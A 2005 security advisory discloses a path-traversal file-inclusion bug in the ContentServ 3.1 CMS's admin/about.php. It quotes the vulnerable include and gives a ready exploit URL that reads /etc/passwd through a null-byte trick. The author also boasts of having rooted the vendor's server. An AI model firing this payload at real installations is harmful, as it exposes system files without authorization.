contentServ.txt

`----------------------------------------------------------------------  
--[ ContentServ (still) features remote reading of arbitrary files ]--  
-------------------------[ [email protected] ]------------------------  
  
/* Boring PHP bug warning:  
* """"""""""""""""""""""""""""""  
* By reading boring PHP bug advisories it is possible to   
* fall asleep (if not affected) instantly w/o a warning!  
*   
* I told you, it's your decision now.  
*/  
  
ContentServ is a cms developed by ... ContentServ.de and is a quite  
commonly used cms system at least in .de.  
  
Some months ago while pentesting www.contentserv.com i've found a bug  
(yo alex i rooted you back then but somehow you didn't need sec support)  
in ContentServ 3.1. which - to my surprise - is still accessible on some  
installations. Somebody should have read the apache logs over there ;)  
I had some fun with it (the bug and your server) back then.  
  
The bug resides in /admin/about.php:  
[...]  
include("../$ctsWebsite/data/config.php");  
[...]  
  
  
This boils down to a damn stupid:  
  
www.we-cant-design-our-hp.com/contentserv/3.1/admin/about.php?  
ctsWebsite=../../../../../../../../../../etc/passwd%00  
  
to give you some informations.  
  
-----------------------------  
Disclosure timeline:  
  
Bug found: 2004  
Bug disclosed: Son Sep 25 16:04:40 CEST 2005  
Bug fixed: ask your vendor  
  
have fun.  
-q  
`